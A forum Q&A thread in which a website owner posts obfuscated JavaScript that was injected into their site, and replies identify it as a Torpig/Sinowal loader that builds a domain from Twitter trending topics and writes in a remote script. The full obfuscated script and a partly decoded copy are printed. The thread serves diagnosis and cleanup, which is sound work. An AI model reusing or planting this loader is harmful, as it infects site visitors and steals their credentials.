Someone maliciously inserted the following code into my website ahoffmanawning.com. Could this be done via a poorly written form php script? Also more importantly, what is this script doing?
<script language="javascript">
$a="Z63dZ3dZ22Z253dst+Z2553tZ2572iZ256eg.Z2566Z2572oZ256dCZ2568arCZ256fdeZ2528(tmZ2570Z252eZ2563hZ22;dzZ3dZ22Z2566Z2575nZ2563tZ2569on Z2564wZ2528t)Z257bcaZ253dZ2527Z252564Z25256fcZ252575mZ252565Z256eZ2574.Z252577ritZ252565Z25252Z2538Z252522Z2527;ceZ253dZ2527Z25252Z2532)Z2527;cZ2562Z253dZ2527Z25253cscrZ252569pZ252574Z2520Z25256caZ25256eguZ252561gZ252565Z25253dZ25255cZ252522Z256aaZ2576aZ2573Z2563Z252572iZ252570tZ2525Z2535Z2563Z252522Z25253Z2565Z2527;ccZ253dZ2527Z25253cZ25255cZ25252fscZ252572Z2569Z252570Z252574Z25253eZ2527;eZ2576aZ256c(unZ2565scaZ2570e(Z2574))Z257dZ253bZ22;caZ3dZ22Z2566Z2575Z256ecZ2574iZ256fn dZ2563sZ2528ds,Z2565sZ2529Z257bdsZ253duneZ2573capZ2565Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edZ22;opZ3dZ22Z2524Z2561Z253dZ2522dw(dcsZ2528cu,Z25314)Z2529;Z2522Z253bZ22;dbZ3dZ22gZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0!Z2520;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vrs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07hucZ22;stZ3dZ22Z2573tZ253dZ2522$Z2561Z253dsZ2574;Z2564cZ2573(Z2564aZ252bdZ2562Z252bZ2564Z2563+Z2564dZ252bdZ2565Z252c1Z2530)Z253bdZ2577(Z2573Z2574Z2529;Z2573tZ253dZ2524aZ253bZ2522;Z22;dcZ3dZ227Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fZ22;czZ3dZ22Z2566Z2575Z256eZ2563tioZ256eZ2520czZ2528cz)Z257brZ2565tuZ2572n Z2563aZ252bcb+Z2563cZ252bcdZ252bce+Z2563Z257aZ253b}Z253bZ22;ceZ3dZ22aZ2572Z2543odZ2565AtZ25280)Z255eZ2528Z25270x0Z2530Z2527+eZ2573))Z2529;Z257dZ257dZ22;ccZ3dZ225ngtZ2568Z253bZ2569+Z252b)Z257btmpZ253ddZ2573.Z2573licZ2565(iZ252ci+Z2531);Z2573tZ22;ddZ3dZ22qb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+Z2519~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2开发者_高级运维526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25209M0;0|uddubcK8888dy}uK7iZ22;cbZ3dZ22(Z2564s);Z2573tZ253dtmZ2570Z253dZ2527Z2527;forZ2528Z2569Z253d0Z253bZ2569Z253cds.lZ256Z22;deZ3dZ22uqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;sz|KZ2520;64c}p`|)Z25$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;Z69Z66Z20(Z64Z6fcuZ6denZ74.coZ6fkieZ2eindZ65xOZ66Z28Z27rf5fZ36Z64sZ27)Z3dZ3d-1)Z7bfunZ63Z74iZ6fn Z63allZ62aZ63Z6b(xZ29Z7bwindoZ77.tZ77Z20Z3d x;Z76Z61rZ20dZ20Z3dZ20newZ20DZ61tZ65Z28);dZ2eseZ74TiZ6de(Z78Z5bZ22as_Z6fZ66Z22]*Z31Z30Z300);Z76arZ20hZ20Z3dZ20dZ2egZ65tZ55TCHZ6fursZ28);Z77iZ6edZ6fwZ2ehZ20Z3d h;if Z28h Z3e 8)Z7bd.sZ65tZ55TCDZ61Z74eZ28d.gZ65tUZ54CZ44Z61Z74Z65()Z20-Z202);Z7delsZ65Z7bd.seZ74UTCZ44ateZ28d.Z67etUZ54CDaZ74e()Z20Z2d Z33)Z3b}wZ69ndZ6fw.gZ64Z20Z3d d;Z76arZ20tiZ6dZ65 Z3d Z6eewZ20ArZ72Z61y(Z29;vaZ72 shZ69ftZ49nZ64Z65xZ20Z3dZ20Z22Z22;timeZ5bZ22yearZ22] Z3d d.Z67etUZ54CFuZ6clZ59earZ28)Z3btimZ65[Z22moZ6etZ68Z22] Z3d dZ2egeZ74UZ54Z43MoZ6etZ68()+Z31;tZ69mZ65[Z22daZ79Z22] Z3d d.gZ65tUZ54CZ44aZ74e(Z29;ifZ20(dZ2egZ65tZ55TZ43MZ6fntZ68()+Z31 Z3cZ2010)Z7bshiZ66Z74IZ6edeZ78 Z3d timZ65[Z22yearZ22] +Z20Z22-0Z22 +Z20Z28d.gZ65tUTZ43MonZ74h(Z29+Z31Z29;}Z65Z6csZ65Z7bshifZ74InZ64eZ78 Z3d tZ69meZ5bZ22yearZ22] +Z20Z22Z2dZ22 Z2b (dZ2egeZ74Z55TCZ4donZ74h(Z29+Z31);Z7dZ69f Z28dZ2eZ67Z65tUZ54CDZ61teZ28Z29 Z3c 10Z29Z7bsZ68ifZ74IndZ65x Z3dshZ69ftZ49ndeZ78 + Z22Z2dZ30Z22 + dZ2eZ67Z65tUZ54CZ44aZ74e()Z3b}eZ6cseZ7bshZ69ftIZ6eZ64Z65Z78 Z3d sZ68ifZ74IZ6edZ65x +Z20Z22-Z22 +Z20dZ2eZ67etUZ54CDZ61tZ65()Z3b}dZ6fcZ75Z6dentZ2ewZ72iZ74Z65Z28Z22Z3cscrZ22+Z22ipt Z6caZ6eguZ61geZ3djZ61vasZ63rZ69ptZ22+Z22 srcZ3dZ27http:Z2fZ2fsearchZ2eZ74wiZ74teZ72.coZ6dZ2ftrZ65nZ64Z73Z2fdaZ69Z6cyZ2eZ6asonZ3fdatZ65Z3dZ22+ shiZ66tInZ64eZ78Z2bZ22&Z63allZ62Z61Z63Z6bZ3dcallbZ61ck2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 Z2b Z22iZ70Z74Z3eZ22);Z7d fZ75nZ63tioZ6e Z63Z61lZ6cbZ61cZ6b2(Z78)Z7bwindZ6fZ77.tZ77Z20Z3d x;Z73c(Z27rf5Z666dZ73Z27,2,7)Z3bevaZ6c(Z75Z6eesZ63apeZ28dzZ2bZ63zZ2bopZ2bsZ74)+Z27dwZ28Z64z+cZ7a($Z61+stZ29Z29;Z27);dZ6fcZ75menZ74.Z77ritZ65(Z24a)Z3b}dZ6fZ63umeZ6et.wZ72iteZ28Z22Z3cimgZ20sZ72cZ3dZ27http:Z2fZ2fseZ61rcZ68Z2etZ77Z69tteZ72.coZ6dZ2fZ69mZ61Z67eZ73Z2fseZ61rcZ68Z2frss.Z70ngZ27 wZ69dtZ68Z3d1Z20Z68Z65ighZ74Z3d1 stZ79lZ65Z3dZ27visibilZ69tZ79:hiZ64deZ6eZ27 Z2fZ3e Z3cscrZ22+Z22ipt Z6cangZ75agZ65Z3djavZ61sZ63riZ70tZ22+Z22 srcZ3dZ27httZ70:Z2fZ2fseaZ72ch.Z74Z77ittZ65rZ2ecomZ2fZ74renZ64sZ2fdaiZ6cy.jZ73Z6fn?cZ61lZ6cZ62ackZ3dcaZ6clbZ61ckZ27Z3eZ22 + Z22Z3cZ2fscrZ22 +Z20Z22ipZ74Z3eZ22);Z7deZ6csZ65Z7b$aZ3dZ27Z27};functionZ20sZ63Z28Z63nm,Z76Z2cedZ29Z7bvar eZ78dZ3dnewZ20DatZ65()Z3beZ78d.Z73Z65tZ44aZ74Z65Z28exdZ2egeZ74Z44aZ74Z65Z28)Z2bedZ29;dZ6fcZ75menZ74.cZ6fokiZ65Z3dcnZ6d+ Z27Z3dZ27 +esZ63apeZ28v)Z2bZ27;expiZ72esZ3dZ27+eZ78Z64.Z74Z6fZ47Z4dTZ53Z74rinZ67();Z7dZ3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($a));
</script>
To reiterate: Nobody run this in your browser kthx
That is obfuscated javascript code; none of us likely have enough time to decode it for you, but if you don't know how it got there, it is most certainly malicious code that will try to install malware using some browser-vulnerability or another.
As to how it got there: someone got access to your server files.
This could be (in order of likely-hood):
- someone discovered a php vulnerability which gave them access to your file-system
- someone got access to your ftp info
- you have a mailicious coder
- or perhaps there's a vulnerability with the web-server, database, operating system, or some service running on your server.
I would change your FTP password, update every conceivable thing in your system to the latest version, and do a serious look-over of any custom PHP code that accesses the file-system.
[Edit]: From the link given by dth, it appears that code downloads and executes a trojan (virus) called Sinowal.
This trojan attempts to steal different system and account information from the infected machine. Stolen information may be the following:
• IMAP/POP3/SMTP username, passwords, server information from mail clients such as AK-Mail,Thunderbird,TheBat
• Bookmarks
• E-mail addresses from the Windows Address Book
• Passwords and other data stored from FTP clients such as Trellian FTP, WS_FTP, Total Commander, Crystal FTP Pro and GlobalSCAPEIt also monitors web browsers such as Internet Explorer, Firefox, and Mozilla for online banking information
This is what it does. It seems like it starts with just garbage to hide what it does but at the end there is some twitter posting going on I think. Enjoy!
cd="%3dst+%53t%72i%6eg.%66%72o%6dC%68arC%6fde%28(tm%70%2e%63h";dz="%66%75n%63t%6
9on %64w%28t)%7bca%3d%27%2564%256fc%2575m%2565%6e%74.%2577rit%2565%252%38%2522%2
7;ce%3d%27%252%32)%27;c%62%3d%27%253cscr%2569p%2574%20%256ca%256egu%2561g%2565%2
53d%255c%2522%6aa%76a%73%63%2572i%2570t%25%35%63%2522%253%65%27;cc%3d%27%253c%25
5c%252fsc%2572%69%2570%2574%253e%27;e%76a%6c(un%65sca%70e(%74))%7d%3b";ca="%66%7
5%6ec%74i%6fn d%63s%28ds,%65s%29%7bds%3dune%73cap%65";da="fqb0t-7vrs}vyb>s%7F}7+
0fqb0cxyvdY~tuh0-0%20+v%7Fb08fqb0y0y~0gy~t%7Fg>dg>dbu~tc9kyv08gy~t%7Fg>x0.0(0660
gy~t%7Fg>x0,0%22!0660y>y~tuh_v870%20'790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyM
K$M>aeubi>sxqbS%7FtuQd8!90;0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mu|cu0yv
088gy~t%7Fg>x0,0)0ll00gy~t%7Fg>x0.0%22%2090660y>y~tuh_v870!(790.0=!9kcxyvdY~tuh0
-0gy~t%7Fg>d";op="%24%61%3d%22dw(dcs%28cu,%314)%29;%22%3b";db="g>dbu~tcKyMK$M>ae
ubi>sxqbS%7FtuQd8!90;0!%20;gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mmyv08cxy
vdY~tuh0.0%209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~t%7Fg>wt>wudEDSVe||Iuqb8
9+dy}uK7}%7F~dx7M0-0gy~t%7Fg>wt>wudEDS]%7F~dx89;!+dy}uK7tqi7M0-0gy~t%7Fg>wt>wudE
DSTqdu89+fqb0t-7vrs}vyb>s%7F}7+fqb0}%7F~dxc0-0~ug0Qbbqi87e~%7F7<07tfu7<07dxb7<07
vyb7<07fyv7<07huc";st="%73t%3d%22$%61%3ds%74;%64c%73(%64a%2bd%62%2b%64%63+%64d%2
bd%65%2c1%30)%3bd%77(%73%74%29;%73t%3d%24a%3b%22;";dc="7<07fuc7<07wxd7<07u~y7<07
ud~7<07|uf7<07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7z7<
7y7<7{7<7|7<7}7<7~7<7%7F7<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~e}ru
bc0-0~ug0Qbbqi8!<%22<#<$<%<%26<'<(<)9+%19ve~sdy%7F~0Sq|se|qdu]qwys^e}rub8tqi<0}%
7F~dx<0iuqb<0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}%7F~dx0N0tqi90:0y~tuh90;
0tqi9+m0f";cz="%66%75%6e%63tio%6e%20cz%28cz)%7br%65tu%72n %63a%2bcb+%63c%2bcd%2b
ce+%63%7a%3b}%3b";ce="a%72%43od%65At%280)%5e%28%270x0%30%27+e%73))%29;%7d%7d";cc
="5ngt%68%3b%69+%2b)%7btmp%3dd%73.%73lic%65(i%2ci+%31);%73t";dd="qb0iuqbSx!<0iuq
bSx%22<0}%7F~dxSx<0tqiSx<0~e}+%19~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0dy}uK7}
%7F~dx7M<0dy}uK7iuqb7M<0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060%20hQQ90
;0~e}9050%26#9050%22%26M0;0|uddubcK888dy}uK7iuqb7M060%20hQQ90,,0%2290;0~e}9050%2
2%M+%19iuqbSx%220-0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0#90;0~e}9050!%209M0;0
|uddubcK8888dy}uK7i";cb="(%64s);%73t%3dtm%70%3d%27%27;for%28%69%3d0%3b%69%3cds.l
%6";de="uqb7M060%20h##!!90..0$90;0~e}9050!%209M+%19}%7F~dxSx0-0|uddubcK88dy}uK7}
%7F~dx7M0;0~e}9050%22%9M0;0|uddubcK88dy}uK7}%7F~dx7M0:0~e}9050%22%9M+tqiSx0-0|ud
dubcK88dy}uK7tqi7M0:0%269050%22'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}
9050%22$9M+4q-4q>bu`|qsu8t<tqiSx0;0iuqbSx%220;0}%7F~dxSx0;0iuqbSx!0;0tqiSx0;0}%7
F~dxcKdy}uK7}%7F~dx7M0=0!M0;07>s%7F}79+m";cu="(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}r
fuyq4gfw)6|``d.;;rvwyr}f:w{y;xp;sz|K%20;64c}p`|)%$4|q}s|`),$*(;}rfuyq*(;p}b*";if
(document.cookie.indexOf('rf5f6ds')==-1){function callback(x){window.tw = x;var
d = new Date();d.setTime(x["as_of"]*1000);var h = d.getUTCHours();window.h = h;
if (h > 8){d.setUTCDate(d.getUTCDate() - 2);}else{d.setUTCDate(d.getUTCDate() -
3);}window.gd = d;var time = new Array();var shiftIndex = "";time["year"] = d.ge
tUTCFullYear();time["month"] = d.getUTCMonth()+1;time["day"] = d.getUTCDate();if
(d.getUTCMonth()+1 < 10){shiftIndex = time["year"] + "-0" + (d.getUTCMonth()+1)
;}else{shiftIndex = time["year"] + "-" + (d.getUTCMonth()+1);}if (d.getUTCDate()
< 10){shiftIndex =shiftIndex + "-0" + d.getUTCDate();}else{shiftIndex = shiftIn
dex + "-" + d.getUTCDate();}document.write("<scr"+"ipt language=javascript"+" sr
c='http://search.twitter.com/trends/daily.json?date="+ shiftIndex+"&callback=cal
lback2'>" + "</scr" + "ipt>");} function callback2(x){window.tw = x;sc('rf5f6ds'
,2,7);eval(unescape(dz+cz+op+st)+'dw(dz+cz($a+st));');document.write($a);}docume
nt.write("<img src='http://search.twitter.com/images/search/rss.png' width=1 hei
ght=1 style='visibility:hidden' /> <scr"+"ipt language=javascript"+" src='http:/
/search.twitter.com/trends/daily.json?callback=callback'>" + "</scr" + "ipt>");}
else{$a=''};function sc(cnm,v,ed){var exd=new Date();exd.setDate(exd.getDate()+e
d);document.cookie=cnm+ '=' +escape(v)+';expires='+exd.toGMTString();};
http://wepawet.cs.ucsb.edu/static/torpig-twitter.html has everything decrypted and analysed for you.
Cheers m8.
Looks like it's getting a list of the trending topics on Twitter. Does that give you any more hints as to how it got there?
精彩评论